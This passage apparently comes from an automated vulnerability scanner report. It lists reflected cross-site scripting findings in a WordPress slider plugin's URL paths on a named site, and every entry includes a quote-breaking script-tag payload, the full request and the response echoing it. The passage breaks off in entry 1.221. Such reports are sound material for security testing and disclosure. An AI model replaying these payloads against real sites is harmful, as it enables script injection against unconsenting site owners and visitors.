1.210. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bf143"><script>alert(1)</script>7ab2e0b1bf was submitted in the REST URL parameter 3. This input was echoed as bf143\"><script>alert(1)</script>7ab2e0b1bf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/pluginsbf143"><script>alert(1)</script>7ab2e0b1bf/superslider-menu/js/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674565+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53368

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/pluginsbf143\"><script>alert(1)</script>7ab2e0b1bf/superslider-menu/js/superslider-menu-min.js" />
...[SNIP]...

1.211. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b82fc"><script>alert(1)</script>dedd8e0a44b was submitted in the REST URL parameter 4. This input was echoed as b82fc\"><script>alert(1)</script>dedd8e0a44b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menub82fc"><script>alert(1)</script>dedd8e0a44b/js/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674568+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674568; expires=Thu, 02-Feb-2012 19:22:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menub82fc\"><script>alert(1)</script>dedd8e0a44b/js/superslider-menu-min.js" />
...[SNIP]...

1.212. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e75ce"><script>alert(1)</script>115e8e28446 was submitted in the REST URL parameter 5. This input was echoed as e75ce\"><script>alert(1)</script>115e8e28446 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/jse75ce"><script>alert(1)</script>115e8e28446/superslider-menu-min.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/jse75ce\"><script>alert(1)</script>115e8e28446/superslider-menu-min.js" />
...[SNIP]...

1.213. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/js/superslider-menu-min.js

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca307"><script>alert(1)</script>082b33d15a1 was submitted in the REST URL parameter 6. This input was echoed as ca307\"><script>alert(1)</script>082b33d15a1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/js/superslider-menu-min.jsca307"><script>alert(1)</script>082b33d15a1 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:51 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674571+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/js/superslider-menu-min.jsca307\"><script>alert(1)</script>082b33d15a1" />
...[SNIP]...

1.214. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 972b5"><script>alert(1)</script>c3df305ca7c was submitted in the REST URL parameter 1. This input was echoed as 972b5\"><script>alert(1)</script>c3df305ca7c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site972b5"><script>alert(1)</script>c3df305ca7c/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:40 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674561+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674561; expires=Thu, 02-Feb-2012 19:22:41 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site972b5\"><script>alert(1)</script>c3df305ca7c/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css" />
...[SNIP]...

1.215. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 60b3e"><script>alert(1)</script>54f1bceee82 was submitted in the REST URL parameter 2. This input was echoed as 60b3e\"><script>alert(1)</script>54f1bceee82 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content60b3e"><script>alert(1)</script>54f1bceee82/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:42 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674562+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674563; expires=Thu, 02-Feb-2012 19:22:43 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:43 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content60b3e\"><script>alert(1)</script>54f1bceee82/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css" />
...[SNIP]...

1.216. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e84f7"><script>alert(1)</script>c0fd9f27655 was submitted in the REST URL parameter 3. This input was echoed as e84f7\"><script>alert(1)</script>c0fd9f27655 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/pluginse84f7"><script>alert(1)</script>c0fd9f27655/superslider-menu/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:44 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674564+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674564; expires=Thu, 02-Feb-2012 19:22:44 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:44 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/pluginse84f7\"><script>alert(1)</script>c0fd9f27655/superslider-menu/plugin-data/superslider/ssMenu/default/default.css" />
...[SNIP]...

1.217. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b31fa"><script>alert(1)</script>eb994eb117d was submitted in the REST URL parameter 4. This input was echoed as b31fa\"><script>alert(1)</script>eb994eb117d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menub31fa"><script>alert(1)</script>eb994eb117d/plugin-data/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:45 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674565+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674565; expires=Thu, 02-Feb-2012 19:22:45 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:45 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menub31fa\"><script>alert(1)</script>eb994eb117d/plugin-data/superslider/ssMenu/default/default.css" />
...[SNIP]...

1.218. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b3ab5"><script>alert(1)</script>b3f3e43ffe4 was submitted in the REST URL parameter 5. This input was echoed as b3ab5\"><script>alert(1)</script>b3f3e43ffe4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/plugin-datab3ab5"><script>alert(1)</script>b3f3e43ffe4/superslider/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674567+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674567; expires=Thu, 02-Feb-2012 19:22:47 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/plugin-datab3ab5\"><script>alert(1)</script>b3f3e43ffe4/superslider/ssMenu/default/default.css" />
...[SNIP]...

1.219. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a4e7"><script>alert(1)</script>bc1d9122022 was submitted in the REST URL parameter 6. This input was echoed as 8a4e7\"><script>alert(1)</script>bc1d9122022 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider8a4e7"><script>alert(1)</script>bc1d9122022/ssMenu/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:49 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674569+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674569; expires=Thu, 02-Feb-2012 19:22:49 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/plugin-data/superslider8a4e7\"><script>alert(1)</script>bc1d9122022/ssMenu/default/default.css" />
...[SNIP]...

1.220. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93e26"><script>alert(1)</script>3ef7b7b12e4 was submitted in the REST URL parameter 7. This input was echoed as 93e26\"><script>alert(1)</script>3ef7b7b12e4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu93e26"><script>alert(1)</script>3ef7b7b12e4/default/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:22:50 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674570+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674571; expires=Thu, 02-Feb-2012 19:22:51 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:22:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">

<head
...[SNIP]...
<input type="hidden" name="badpage" value="/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu93e26\"><script>alert(1)</script>3ef7b7b12e4/default/default.css" />
...[SNIP]...

1.221. http://wp-superslider.com/site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css [REST URL parameter 8]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wp-superslider.com
Path:   /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/default/default.css

Issue detail

The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e93d9"><script>alert(1)</script>b1176fcac2 was submitted in the REST URL parameter 8. This input was echoed as e93d9\"><script>alert(1)</script>b1176fcac2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site/wp-content/plugins/superslider-menu/plugin-data/superslider/ssMenu/defaulte93d9"><script>alert(1)</script>b1176fcac2/default.css HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;

Response

HTTP/1.1 404 Not Found
